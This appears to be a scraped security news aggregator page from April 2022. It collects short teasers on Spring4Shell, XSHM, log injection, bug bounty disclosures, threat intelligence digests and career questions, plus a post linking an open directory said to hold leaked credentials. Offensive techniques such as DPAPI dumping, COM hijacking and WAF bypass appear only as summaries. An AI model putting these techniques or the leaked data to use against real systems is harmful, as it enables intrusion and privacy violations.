    Today I'd like to talk briefly about the Permissions-Policy (formerly Feature Policy) header. Permissions-Policy Permissions Policy, also called Feature Policy, is a security policy header defining a mechanism that lets developers selectively enable and disable the use of various browser features and APIs. Its overall behaviour resembles CSP (Content-Security-Policy), but where CSP is a policy that restricts, Permissions Policy is a policy that controls features; "features" here means browser capabilities such as the camera and GPS. The syntax, as in CSP, is written as directives with allowlists: Permissions-Policy: directive=(allowlist), directive=(allowlist)
    XSHM (Cross Site History Manipulation)
    🔍 Introduction XSHM (Cross Site History Manipulation) is an attack that uses the user's browser history. It ranges from phishing that simply rewrites the previous history entry so the user lands on a page the attacker intends, to bypassing SOP or stealing sensitive information through CSRF or an IFRAME. https://developer.mozilla.org/en-US/docs/Web/API/Window/history https://developer.mozilla.org/en-US/docs/Web/API/History The calls that allowed the history to be changed were history.pushState('','','https://www.hahwul.com/fafa') and history.replaceState('','','https://www.hahwul.com/z') 🗡 Offensive techniques Detect This attack rarely works on its own; it needs script injection on a page the attacker controls, for example through XSS or an uploaded file.
  • Open

    SecWiki News 2022-04-08 Review
    Persistence by overriding PowerShell cmdlets by 风迷; Beautiful side channels: from timeless attacks to pipeline amplification attacks by ourren; MITRE ATT&CKcon 3.0 Presentations on SlideShare by ourren. For more recent articles, visit SecWiki
  • Open

    The Case for 2FA by Default for WordPress
    Administrator panel compromises are one of the most common attacks that everyday WordPress website admins face. We work with thousands of clients who have encountered attacks on their websites and I’ve long ago lost count of the number of times that I’ve told clients that the point of entry was their WordPress login page. Brute force attacks and compromised administrator users are overwhelmingly the most common attack vectors for the CMS platform, which as of 2022 makes up over 40% of the entire web. Continue reading The Case for 2FA by Default for WordPress at Sucuri Blog.
  • Open

    Timestomping Registry Keys
    If you've worked in DFIR or threat intel for any amount of time, you've likely either seen or heard how threat actors modify systems to meet their own needs, configuring systems to provide data or hide their activities as they make their way through an infrastructure. From disabling services, to modifying the system to maintain credentials in memory in plain text, to clearing Windows Event Logs, sometimes it seems that the threat actor knows more about the platform than the administrators. These system modifications are used either to provide easier access to the threat actor, or to hide the impacts of their activities by "blinding" the administrators, or simply by removing clear evidence of the activity. Sometimes these system modifications go beyond the administrators, and are meant instead…
  • Open

    Binary Exploitation (Pwn) Challenge Walkthroughs - PicoCTF 2022 (BEGINNER-FRIENDLY)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    FreeBuf Morning Report | FIN7 member sentenced to 5 years in prison; global supply chain attacks surged 51% in H2 2021
    Denys Iarmak, a senior member of the cybercrime group FIN7, was sentenced to five years in prison by a US judge on Thursday local time.
    Zero Hour Technology | Analysis of the APE attack
    An attacker can use a flash loan to obtain NFTs, claim the APE airdrop with them, and then return the NFTs to repay the flash loan, which poses a threat to the project.
    First malware targeting the AWS Lambda serverless platform appears
    The malware uses an updated command-and-control address resolution technique to evade typical detection measures and virtual network access controls.
    FIN7 hacking group member sentenced to 5 years in prison
    A penetration tester for the FIN7 hacking group was sentenced to 5 years in prison for stealing credit card information.
    FreeBuf defender group discussion | Talking about enterprise API security
    Insecure APIs have become one of the main targets of attackers. How should we avoid this, and what does a relatively secure API look like?
    Russian oil giant Gazprom Neft's website shut down after hacker attack
    The website of Gazprom Neft, the oil arm of Russian state gas company Gazprom, was forced offline after a hacker attack.
    Google improves Android security with new developer policies
    On 6 April, Google announced several key policy updates for Android app developers to improve the security of users, Google Play and related apps.
    FreeBuf Weekly | Major vulnerability disclosed in Samsung phones; Fox News leaks 13 million records
    Fox News leaked 13 million records, including employee information.
    Global Advanced Persistent Threat (APT) 2021 Annual Report
    Beijing and the coastal provinces of Guangdong, Fujian, Zhejiang and Jiangsu, as China's political centre and economically developed regions, are the main target areas of foreign APT groups.
    Under multiple layers of regulation, who is still "mining"?
    With regulation of cryptocurrency "mining" tightening continuously since 2021, who is still mining?
  • Open

    Movies and assorted stuff.
    submitted by /u/omnifage [link] [comments]
  • Open

    Duqu malware | Cybersecurity
    submitted by /u/OkFaithlessness2414 [link] [comments]
    Any good threat hunting resources? Looking for query libraries.
    Currently using Sigma and Microsoft query libraries. New to threat hunting, and looking to learn more about resources that are out there. Thanks. submitted by /u/haloman882 [link] [comments]
  • Open

    Understanding Python 2 Vulnerabilities
    Introduction Continue reading on InfoSec Write-ups »
    TOR: The Less Secure Side With Potential Vulnerabilities.
    No content preview
  • Open

    PCI DSS v4.0 Resource Hub
    submitted by /u/Pomerium_CMo [link] [comments]
    fullhunt/spring4shell-scan: A fully automated, reliable, and accurate scanner for finding Spring4Shell and Spring Cloud RCE vulnerabilities
    submitted by /u/mazen160 [link] [comments]
    Denonia: The First Malware Specifically Targeting Lambda
    submitted by /u/lormayna [link] [comments]
    SpiderFoot 4.0 release - introducing YAML correlation rules
    submitted by /u/smicallef [link] [comments]
    Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive)
    submitted by /u/alt3kx [link] [comments]
  • Open

    Notes from a HackMyVM comprehensive range penetration test: helium
    The content of this range is very realistic and is for technical discussion and learning only; do not use it for illegal purposes, for which the author bears no responsibility!
    FreeBuf Morning Report | Google removes several data-collecting apps; NIO employee exposed for mining on company servers
    The person involved is reportedly a NIO employee who previously served as a cluster server administrator and, while employed, used the company's servers to mine cryptocurrency.
    Cash App data breach may affect 8.2 million US users
    US payments giant Block recently disclosed a data breach involving its investment app Cash App and notified its 8.2 million US users.
    Critical vulnerabilities found in multiple VMware products
    Multiple VMware products contain critical vulnerabilities that attackers can exploit for remote code execution.
    South African and US investigators jointly raid BEC fraud gang
    South African and US investigators jointly arrested several members of a fraud gang linked to a notorious Nigerian business email compromise (BEC) group.
    Beware! New FFDroider malware targets Facebook and other social accounts
    Zscaler researchers say the malware hijacks victims' social media accounts by stealing credentials and cookies stored in the browser.
    BruteXSS: an XSS brute-forcing tool
    This article introduces a tool that automatically inserts XSS payloads and supports custom payloads.
    Android penetration testing suite zANTI v2.5 released (with detailed notes)
    zANTI is an Android penetration testing tool that supports sniffing connected networks, man-in-the-middle testing, port scanning, cookie capture and router security testing.
    Nmap web edition: Rainmap Lite
    Rainmap Lite is a web application for Nmap that lets users launch Nmap scans from a phone, tablet or web browser!
  • Open

    Ukraine — Situation update, 8 April
    The last 24 hours Continue reading on Medium »
    Linux console utilities for domain network reconnaissance
    "Network reconnaissance" means collecting information about a domain from open sources, that is, Open Source Intelligence (OSINT). In this article I… Continue reading on KR. LABORATORIES IT BLOG »
    War in Ukraine / April 6
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Logging information about users through news
    Let’s talk about masking logged links using the https://telegra.ph/ Continue reading on Medium »
    Virtual OSINT labs…
    Small topic. But without it, you just can’t. Virtual OSINT labs that will be useful for security researchers as well. Choose your…… Continue reading on Medium »
  • Open

    Exposed Golang Pprof debugger at https://cn-geo1.uber.com/
    Uber disclosed a bug submitted by boobalan123: https://hackerone.com/reports/1385906 - Bounty: $500
    Chain of IDORs Between U4B and Vouchers APIs Allows Attackers to View and Modify Program/Voucher Policies and to Obtain Organization Employees' PII
    Uber disclosed a bug submitted by hunt4p1zza: https://hackerone.com/reports/1148697 - Bounty: $10250
    Reflected XSS on []
    U.S. Dept Of Defense disclosed a bug submitted by saajanbhujel: https://hackerone.com/reports/1267380
    [www.] Path-based reflected Cross Site Scripting
    U.S. Dept Of Defense disclosed a bug submitted by geeknik: https://hackerone.com/reports/1159371
    [CVE-2020-3452] on
    U.S. Dept Of Defense disclosed a bug submitted by splint3rsec: https://hackerone.com/reports/1234925
    username and password leaked via pptx for website
    U.S. Dept Of Defense disclosed a bug submitted by ibrahimatix_: https://hackerone.com/reports/1512199
    Broken access control, can lead to legitimate user data loss
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1493007
    Authorization bypass -> IDOR -> PII Leakage
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1489470
    Cross-site Scripting (XSS) - Reflected at https:///
    U.S. Dept Of Defense disclosed a bug submitted by mamunwhh: https://hackerone.com/reports/1370746
    SQL Injection in
    U.S. Dept Of Defense disclosed a bug submitted by lubak: https://hackerone.com/reports/1489744
    XSS on https:///' parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252020
    XSS on https:/// parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252229
    XSS on https:/// via parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1252059
    XSS on https:/// via parameter
    U.S. Dept Of Defense disclosed a bug submitted by homosec: https://hackerone.com/reports/1251868
    Open Akamai ARL XSS at
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1317031
    Bypassing CORS Misconfiguration Leads to Sensitive Exposure at https:///
    U.S. Dept Of Defense disclosed a bug submitted by whoisbinit: https://hackerone.com/reports/1092125
    XSS Reflected -
    U.S. Dept Of Defense disclosed a bug submitted by drauschkolb: https://hackerone.com/reports/1223575
    Uninstalling Rockstar Games Launcher for Windows (64-bit), then reinstalling keeps you logged in without authentication
    Rockstar Games disclosed a bug submitted by toxiqcitee: https://hackerone.com/reports/1278261 - Bounty: $250
  • Open

    A Detailed Guide on Cewl
    Hi, Pentesters! In this article, we are going to focus on the Kali Linux tool “Cewl” which will basically help you to create a wordlist. The post A Detailed Guide on Cewl appeared first on Hacking Articles.
  • Open

    Multiple vulnerabilities leading to account takeover in TikTok SMB subdomain.
    I'm here to tell you how I achieved account takeover in TikTok. I submitted this bug to HackerOne and got $1000 for it. Continue reading on Medium »
    SuperBots Bug Bounty is here! Win up to $25,000!
    Continue reading on Medium »
    DonPAPI — Dumping DPAPI Credz Remotely
    Dumping relevant information on compromised targets without AV detection  DPAPI dumping Continue reading on Medium »
    Personal Security Checklist
    A curated checklist of tips to protect your digital security and privacy Continue reading on Medium »
    Recon tool for bug bounty
    Layla is a python script that automatically performs recon on a given URL. It combines the outputs of other known tools into a single one. Continue reading on Medium »
    ScaRCE (scarce-apache2): a framework for bug hunting or pentesting targeting websites that have CVE-2021-41773…
    This tool can scan websites for the CVE-2021-41773 vulnerability affecting the Apache2 web server; ScaRCE can also run to execute… Continue reading on Medium »
    Web-Hacking-Toolkit — A Multi-Platform Web Hacking Toolkit Docker Image With Graphical User…
    A multi-platform web hacking toolkit Docker image with Graphical User Interface (GUI) support. Installation Continue reading on Medium »
  • Open

    Hunting Secrets from Containers by Analysing Docker Images
    submitted by /u/tbhaxor [link] [comments]
  • Open

    Looking for advice on my next SANS course.
    Company is buying... I'm in Incident Response (3 years). Passed my 508 last year and now I have the opportunity to take another course. I have been tossing around the idea of moving from IR to a different area like detection engineering, hunting/intel or attempting to move to a dedicated Purple Team full time. Would taking FOR578 be the best step forward as far as flexibility in career advancements go? Maybe something else? submitted by /u/SlowBoatToHades [link] [comments]
    Getting back on track after a long break
    Hi guys, I'm a cybersec engineer that had some kind of break from security (I learnt lots of web development for the last 6 months or so) and well I really got out of shape. Now, I would like to get back on track and I was looking for resources / advice on how to do this better if any of you want to share. I really appreciate the help! submitted by /u/GeologistLegitimate6 [link] [comments]
    Been studying for OSCP for 250+ hours and i'm starting to doubt it's relevance to real pentesting. Looking for guidance
    Some background on me: I used to be a programmer (2.5 years). Quit my job to pursue my passion, offensive cyber security. OSCP seemed like a great option for someone who hates written exams like me and loved the brutal nature of a 24 hour skill based exam. Been documenting my noob to OSCP journey on youtube, week by week: https://youtube.com/playlist?list=PLSGxDsVUZ-zzB4DzUb4b2lfihBFgj53eU The OSCP exam is a network penetration testing exam, strictly. There is little to no web exploitation. I was having a talk with a friend of mine on a CTF team I joined and he mentioned that network penetration testing is less relevant than it was in the past. Now, the OSCP does cover active directory and basic buffer overflow, which seems nice to know for sure. However the initial foothold often relies on heavily out of date software (think: 2006) for which an RCE exploit is readily available on exploit-db. Having worked as a developer for a few years, yeah, I can confirm everything we do is based on web apps. Everything. Especially with work from home, I mean sometimes in companies that utilize remote work heavily there is no "domain controller". Just a bunch of devs collaborating on github or bitbucket. I'd say I'm about 250 more hours away from being OSCP ready (half way there) and I think that time would be better served on hackthebox, hackerone, and doing CTFs with my team. Given what I know about the OSCP I don't believe these things will help much with passing the exam even though they would make me a better professional. It's really one or the other. TLDR: Penetration testers, security engineers, etc: how important is network penetration to your job functions? (AKA, how relevant is OSCP?) Thanks in advance for your guidance. submitted by /u/NSP781 [link] [comments]
    I feel like i am wasting my time .
    Hi, 24 [M], basically I was in computer engineering school 4 years ago. But it was shit, the exams were literally copy paste from past exams and people didn't study, they just memorised. I had anxiety during exams and could never think with a clear head, I was very depressed, and I failed 3 semesters straight with all F's. So I transferred to MIS school, business informatics. I took programming courses, basic networks, and basic hardware, and an introduction to information security course. But I self studied many concepts in computer science like ML, web, game dev, and finally security. Right now I am doing an internship as technical support, I am learning about Sophos firewall and later will learn about Azure and cloud security. I am 'Script kiddie' on hackthebox but I am getting better, I consider m…
    GAQM CISP good next step?
    Hi everyone, going to do my Security+ soon; wondering if CISP from GAQM is a good next step after Sec+. Whenever I try to find info on it the search is overrun by CISSP, which is a more challenging certification. submitted by /u/Namibguy [link] [comments]
    Looking for cybersecurity or digital privacy ideas / topics for my undergraduate degree
    Hi, I'm in the planning phase of my bachelors degree in information technology. I want to write about either cybersecurity and / or digital privacy. I have two main ideas currently: To set up a / or several honeypot services (WordPress sites, E-commerce website and or incomplete web apps) and collect the data running through them from bots and hopefully unsuspecting bad actors. To create a browser add-on or web app to visualize, in 3D (webgl), the trackers that are currently tracking you on a website. Any comments on the above mentioned topics, or any other interesting topics regarding: cybersecurity, digital privacy, big brother society and / or cryptography would be highly appreciated. submitted by /u/krullmizter [link] [comments]
    Netskope - Accidental install on personal PC, What can be seen?
    I am a consultant and work with many companies. One incorrectly pegged me as an FTE and sent an urgent email to download Netskope to access their data. I downloaded it and opened it but didn't realize it actually installed anything. Got some text box that I thought was an error. Later that day I found out it was not necessary for me to have Netskope. Today, I tried to access a website blocked by the company's acceptable use policy and found out that Netskope was in fact installed and had been active for a couple of weeks. I uninstalled it and have been able to access all websites again. Questions: 1) What exactly can a tool like this see? I assume my web browsing history, which is whatever, but can it see what Google Analytics data or otherwise I accessed for my other clients? What if I didn't download anything? Can it see my Google Drive documents not related to the specific company email? Can it see all of my passwords? 2) Is it worthwhile to ask the client company to delete my data? 3) I uninstalled it, which stopped it from blocking my access to websites. Is this enough or should I hard reset my entire computer? submitted by /u/phillytrees
  • Open

    SecWiki News 2022-04-07 Review
    Data compression in APT forensic analysis by ourren; The metaverse and national data security: challenges and trends in building an ecosystem-based governance system by ourren. For more of the latest articles, visit SecWiki
  • Open

    Mental Models
    This page contains my collection of mental models I use for decision-making, business, and life in general. Some models are more practical and, as such, can be applied to everyday situations. Others can be used for long-term decisions or simply enjoyed as a thought exercise. Keep in mind that one should never be stuck thinking with common frameworks like the ones provided here. You should use your judgment and adjust to your situations. It is also essential to understand that these mental models are meaningless unless you internalize them. Further reading and practice are required. Circle of competence: Focus on what you know. Double down on your strengths, and do not obsess about your weaknesses. For example, Einstein might not be the best pick for a basketball team, but that does not mean he is …
  • Open

    Getting more information about IP hosted by AWS
    I am trying to prove that a phishing email that I received was sent from the IT department at my institution as a way to help people "learn" not to click on links from unknown senders. The email header traces back to an IP at AWS. I know very little about tools and resources to dig further into the real source of a message like this. Is it possible, and if so, can anyone suggest some tools that I should look into? submitted by /u/sudomakemetacos
  • Open

    Log Injection
    🔍 Introduction: Log injection arises when user input is written into logs; an attacker can use this to forge log entries or insert malicious content into the log. 🗡 Offensive techniques. Detect (WhiteBox): it is easy to identify when you can inspect the source code or the logs. If error logs record the user's input values, the application is affected by this weakness. Code level: check whether user input reaches the parts of the code that write logs, for each language. Log level: actually trigger errors through web requests and inspect the log entries that are recorded. Vulnerable code for each language is compiled in Vulncat, so please refer to that document.
  • Open

    Module-2 | OWASP ModSecurity Core Rule Set - Pentesting & Bypassing Cloud Web Application Firewall…
    Series of Network Fundamentals #5 (Ports & Protocols), to get started in Cyber Security.
  • Open

    Looking at file upload WAF bypass from the dotnet source code
    Author: Y4er Original link: https://y4er.com/post/fileupload-bypass-with-dotnet/ Preface: After reading the Cyber group's "Looking at file upload WAF bypass from the commons-fileupload source code", which mentioned at the end that dotnet has the same issue, I took a look at the dotnet source code. Environment: public ActionResult Index() { if (Request.Files....
    CVE-2022-22947 SpringCloud GateWay SPEL RCE Echo Response
    Author: Y4er Original link: https://y4er.com/post/cve-2022-22947-springcloud-gateway-spel-rce-echo-response/ Environment: git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout ...
  • Open

    Spring Framework RCE (CVE-2022-22965) NMAP (NSE) Checker (Non-Intrusive)
    Article URL: https://github.com/alt3kx/CVE-2022-22965 Comments URL: https://news.ycombinator.com/item?id=30941327 Points: 1 # Comments: 0

  • Open

    FIN7 Power Hour: Adversary Archaeology and the Evolution of FIN7
    submitted by /u/dmchell
  • Open

    Ok so how do I know for sure if my iPhone is hacked?
    Any suggestions? submitted by /u/Unlucky_Cut_2534
    Easy and basic tls mitm proxy?
    I wish to look into some application traffic that is transported over TLS. I found this proxy: https://docs.mitmproxy.org/stable/concepts-howmitmproxyworks/ Do any of you have experience with this or other solutions you would recommend? submitted by /u/koera
    Subdomain MX records
    Are there any security implications to consider when adding an MX record to a subdomain that points to a trusted 3rd party vendor? submitted by /u/mtx4gk
    Pen Testing
    Who from IT Security would be tasked with sourcing a vendor for pen testing? What would be their job title? submitted by /u/bluesail1021
    Podcast idea
    I was thinking about a way to spend my extra time and I thought of an idea of starting a podcast to interview cyber professionals about how they got into cyber and hear their stories. I've never podcasted before but I imagine it would be casual conversation with some standard conversations strictly focused on their careers. I don't know if anything like this is already out there but I could see this serving a need because I constantly see people posting things like "how do I get into cyber" etc. I was thinking about having diversity in people and jobs where you have your traditional technical jobs but also pivot into the non-technical roles like GRC, sales, project MGMT, etc. that still have a need in the field. I guess I'm looking for some feedback... on a surface level, would this be something of interest for you? submitted by /u/gnomeparadox
  • Open

    Ukraine — Situation update as of April 7
    The last 24 hours Continue reading on Medium »
    The Academy of the Ministry of Internal Affairs of Russia will prepare manuals for the fight…
    “Based on an application from the Investigation Department of the Ministry of Internal Affairs of Russia, we are developing methodological… Continue reading on Medium »
    War in Ukraine / April 5
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    How to set the approximate location of a person using the Yandex search engine?
    It’s no secret that search engines collect information about their users. But this allows us to determine the location of your target by… Continue reading on Medium »
    Ukraine — Situation update as of April 6
    The last 24 hours Continue reading on Medium »
  • Open

    Hacker Interview #2: Alvin “Steiner254”
    Learning cybersecurity comes in many forms: technical practice, lab workshops, and also writeups. Bug bounty hunter Alvin, going by the… Continue reading on HackenProof »
    What is SQL Injection?
    What is It? Continue reading on Medium »
    How I got access to 1600k Users PII Data $$$$
    Hello Guys 👋 I am Gokul, Python developer, Cyber security researcher, Part time Bug hunter and Open source tool maker, Studying 3rd year… Continue reading on Medium »
    [NEW EVENT] BUG HUNTING BOUNTY IN STMAN TESTNET
    Dear Stickmen, you must be all very excited to experience the Testnet version to be released today. To celebrate this event and create the… Continue reading on Medium »
    Top 5 Geeky Websites 2022
    Hi everyone, hope you're doing great. So today I'll introduce you to five amazing websites which can be very helpful for everyone and I… Continue reading on Medium »
    Watch out the links : Account takeover
    This is my second writeup here :), hope you enjoy it too! Continue reading on Medium »
  • Open

    Ghostwriter v2.3.0 & 2022 Road Map
    Ghostwriter is changing! We have a new release candidate and a GraphQL API open for feedback. Continue reading on Posts By SpecterOps Team Members »
  • Open

    SecWiki News 2022-04-06 Review
    Netgear R8300 stack overflow vulnerability analysis by chamd5; Security analysis of the drone MAVLINK protocol by chamd5; MITRE ATT&CK fourth-round evaluation results released by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Validate AWS CloudFormation templates for security misconfigurations and vulnerabilities (online tool)
    submitted by /u/elitistAlmond
    Dirty Pipe Explained - CVE-2022-0847
    submitted by /u/freakwin
    RedFat: A Binary Hardening System for Linux/ELF/x64
    submitted by /u/zoomT
  • Open

    Burp Scanner can now crawl static sites between 6x - 9x faster
    Burp Suite Professional version 2022.2.3 made Burp Scanner's crawler between 6x - 9x faster when used against static or stateless sites. This helps you to carry out automated reconnaissance much faste
  • Open

    FreeBuf Morning Report | Twitter restricts Russian government accounts; Intel shuts down all business in Russia
    Twitter has restricted content from more than 300 official Russian government accounts, including that of Russian President Putin.
    Ukraine's CERT-UA warns that the Russia-linked Armageddon APT group is attacking Ukrainian state agencies
    Recently, Ukraine's CERT-UA emergency response team published a security report reminding domestic organizations to be wary of the Russia-linked cyber-espionage group Armageddon APT.
    Gartner: Six steps to building a cloud strategy
    In 2022, innovative technologies at enterprises keep emerging, and organizations will inevitably use new technologies to optimize their cloud deployment plans.
    [In-depth] Analysis and thoughts on the principles of the Spring remote command execution vulnerability (CVE-2022-22965)
    This article reproduces and analyses the vulnerability, hoping to help those who need it to research it further.
    New info-stealing trojan BlackGuard appears on Russian-language hacker forums, priced at $200 per month
    Researchers found BlackGuard being offered as malware-as-a-service on a hacker forum.
    Multiple APT groups stirring in the Russia-Ukraine conflict
    A month ago, the Russia-Ukraine conflict shook the world, and APT groups around the globe used related topics as lures for their attacks.
    Germany shuts down Hydra, the world's largest darknet market
    Germany shut down Hydra, the world's largest darknet market, and seized $25 million.
    Retailer The Works forced to close stores after a cyber attack
    The Works, a leading UK high-street retailer, was forced to close some of its stores and suspend part of its operations after a cyber attack.
    Microsoft detects Spring4Shell attacks in its cloud services
    Microsoft said that since the vulnerability emerged, it has observed continuous attacks exploiting the Spring Cloud and Spring Core vulnerabilities in cloud services.
  • Open

    Windows Persistence: COM Hijacking (MITRE: T1546.015)
    Introduction According to MITRE, “Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking The post Windows Persistence: COM Hijacking (MITRE: T1546.015) appeared first on Hacking Articles.
  • Open

    OSINT Dojo: Sakura
    picoCTF 2022- Writeup
  • Open

    Analysis and thoughts on the principles of the Spring remote command execution vulnerability (CVE-2022-22965)
    Author: 麦兜. This article is a reader contribution; Seebug Paper looks forward to your submissions, and every accepted article receives a gift! Submission mailbox: paper@seebug.org. Preface: Last week an RCE vulnerability in the Spring framework surfaced online; after circulating in the wild for a short while, Spring officially published the vulnerability details on March 31, with the identifier CVE-2022-22965. This article reproduces and analyses the vulnerability, hoping to help those who need it to research it further. 1. Background knowledge 1....
    Analysis of a sandbox escape vulnerability in Chrome's Mojo component
    Author: 天玄安全实验室 (Tianxuan Security Lab) Original link: https://mp.weixin.qq.com/s/tGwCwOQ8eAwm26fHXTCy5A Vulnerability description: Issue-1062091 is a UAF vulnerability in Chrome, located in Chromium's Mojo framework; exploiting it can lead to a sandbox escape in Chrome and Chromium-based browsers. The vulnerability was introduced in a commit in Chrome 81.0.4041.0. A few weeks later, ...
  • Open

    Attacker shall receive order updates on WhatsApp for users who have activated WhatsApp notifications
    Zomato disclosed a bug submitted by schutzx0r: https://hackerone.com/reports/1523584 - Bounty: $300
  • Open

    Anyone got an extra sans GCFA practice test?
    PM me. Much appreciated. submitted by /u/CrazyKitty2016

  • Open

    Telegram OSINT: Generating a data ‘backbone’ for investigation
    With Telegram growing ever more popular, vast amounts of data are being generated which we can use to map trends and fuel investigations… Continue reading on Medium »
    How to find open databases using ElasticSearch
    What we can do with Shodan Continue reading on Medium »
    OSINT Dojo: Sakura
    In this article, I learn how to use Open Source Intelligence (OSINT) techniques to identify a number of identifiers and other pieces of… Continue reading on InfoSec Write-ups »
    War in Ukraine / April 4
    The Molfar team sends a daily newsletter about the war in Ukraine. Continue reading on Medium »
    Tools for internet anonymity and in case of internet blockage (Part 2).
    VPN for mobile devices: Continue reading on Medium »
    Bigdata analysis and eDiscovery
    ICIJ Datashare — an eDiscovery tool that allows you to quickly and easily index and search multiple documents. And, according to the user… Continue reading on Medium »
    Deep web OSINT
    OSINT (Open Source Intelligence) is widely used in our community... and mostly free. Continue reading on Medium »
    TryHackMe: Subdomain Enumeration Writeup
    This room aims to teach the various ways of discovering subdomains to expand your attack surface of a target. We will learn about 3… Continue reading on Medium »
  • Open

    /r/netsec's Q2 2022 Information Security Hiring Thread
    Overview: If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines: Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback: Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead). submitted by /u/ranok
    CVE-2022-25372: Local Privilege Escalation in Pritunl VPN Client
    submitted by /u/hackers_and_builders
    House of Heap Exploitation Dojo — CanSecWest 2022 Registration
    submitted by /u/mdulin2
    Wordle for CVEs!
    submitted by /u/benzies
    Kepler: open source CVE Search Engine written in Rust
    submitted by /u/bndt00
    Shielder - A Sneak Peek into Smart Contracts Reversing and Emulation
    submitted by /u/smaury
    CVE Markdown Charts - Your InfoSec reports will now write themselves...
    submitted by /u/onlinereadme
    Researchers Uncover New Android Spyware With C2 Server Linked to Turla Hackers. Interestingly, the app establishes contact with a remote command-and-control server, 82.146.35[.]240, which has been previously identified as infrastructure belonging to the Russia-based hacking group known as Turla.
    submitted by /u/Late_Ice_9288
  • Open

    An OD with all the photos of r/place
    The OD contains snapshots taken roughly every 30 seconds. https://rplace.space/combined/1649112455.png is the last photo before white became the only option. https://rplace.space/combined/ submitted by /u/PhlegethonAcheron
    Screenshots of r/place. Taken every 30 seconds.
    submitted by /u/bigfootsocks
    Can someone help me identify what I'm looking at? I'm afraid I've found something.
    Hello - honestly not sure what I'm looking at and found this oddly niche sub after my post was removed on NoStupidQuestions. I seem to have found some sort of directory with tons of files - some seeming to contain txt files called "indian embassy" or "xbox live leak". These files contain email addresses and a hashed password as well as some other pieces of info. Am I looking at something harmless or have I found something nefarious? Here is a link to the directory. Please open a text file and tell me if I need to report to authorities or something? http://mirrors.xieke.org/Sec/ submitted by /u/Dgb_iii
    Anyone know of an app or anything to more easily browse ODs on mobile? I'm constantly tapping to zoom in and browse - it's a bit maddening. TIA!
    submitted by /u/platynom
  • Open

    House of Heap Exploitation Training - CanSecWest 2022
    Heap exploitation serves as a huge wall on the binary exploitation journey. As a result, we have created a training for breaking through this wall. This training has been taught at DEFCON, ToorCon and to several private companies in the past. In this two day training, we will go over how the glibc malloc allocator works and a variety of heap specific vulnerability classes, and demonstrate how to pwn the heap in a myriad of ways, including the breaking of the allocator itself and living off the land with the program being targeted. To end the training, there is an HTTP server with realistic vulnerabilities. In the final section, we will create a full exploit chain with an info leak to break ASLR/PIE and get code execution with a separate use after free. This section includes hands on exploit development with people helping you with the complex process of heap grooming, planning and exploiting. Feel free to reach out if you have any questions. Link to the training: https://www.register.cansecwest.com/csw22/heapexploitdojo submitted by /u/mdulin2
  • Open

    DISTRIBUTED VERIFICATION OF SSL CERTIFICATES
    Continue reading on Medium »
    Komodo Consulting — Best Black Box Pen Testing, Penetration Testing Service Provider
    Studies reveal that many web applications have medium- and high-risk security flaws. Also, it is easy to identify and exploit the… Continue reading on Medium »
  • Open

    SecWiki News 2022-04-05 Review
    No news updated yet today~ For more of the latest articles, visit SecWiki
  • Open

    Process Injection via Component Object Model (COM) IRundown::DoCallback() @MDSecLabs
    submitted by /u/dmchell
  • Open

    Burp Suite Enterprise Edition Kubernetes deployment and auto-scaling
    Burp Suite Enterprise Edition is the dynamic vulnerability scanner that can help you to secure your whole web portfolio. And with release 2022.3, we've taken those same flexible Burp scans and made th
  • Open

    Threat Modeling
    🚧 There are many parts I am still studying, so there may be mistakes or odd bits. Please do not take this post as authoritative, and if you find anything wrong, I would be truly grateful if you let me know in the comments :D 🔍 Introduction: Threat modeling identifies threats and mitigations in order to protect something of value, and expresses them in a form that is easy to understand. It is a methodology that structures and represents all information that can affect the security of an application, system, service, etc., and identifies security problems on that basis. I plan to organize it roughly along the following flow.
    Spring4Shell RCE vulnerability (CVE-2022-22965)
    Last week the internet nearly caught fire again because of the Spring4Shell vulnerability. Fortunately it passed without much drama, since it is harder to reproduce than Log4Shell. A bit late, but I thought I would write up the issue while I am at it. Spring4Shell is a vulnerability that allows RCE (Remote Code Execution) in Spring Core on JDK 9 or later. It was a 0-day at the time of disclosure; CVE-2022-22965 was assigned and a patch released afterwards. There was a lot of debate about whether it was a big deal or not; in the end it received a CVSS score of 9.8. The problem: when Spring MVC or Spring WebFlux is running on JDK 9+ and a data binder is enabled on an endpoint, attack code included in the request is processed during binding, and the logic intended by the attacker is executed.
  • Open

    Making SMB Accessible with NTLMquic
    This week, I dusted off my reading list and saw that I’d previously bookmarked an interesting article about the introduction of SMB over QUIC. The article from Microsoft showed that Windows was including support for SMB to be used over the QUIC protocol, which should immediately spark interest for anyone who includes SMB attacks as... The post Making SMB Accessible with NTLMquic appeared first on TrustedSec.
  • Open

    Career changer. Any advice?
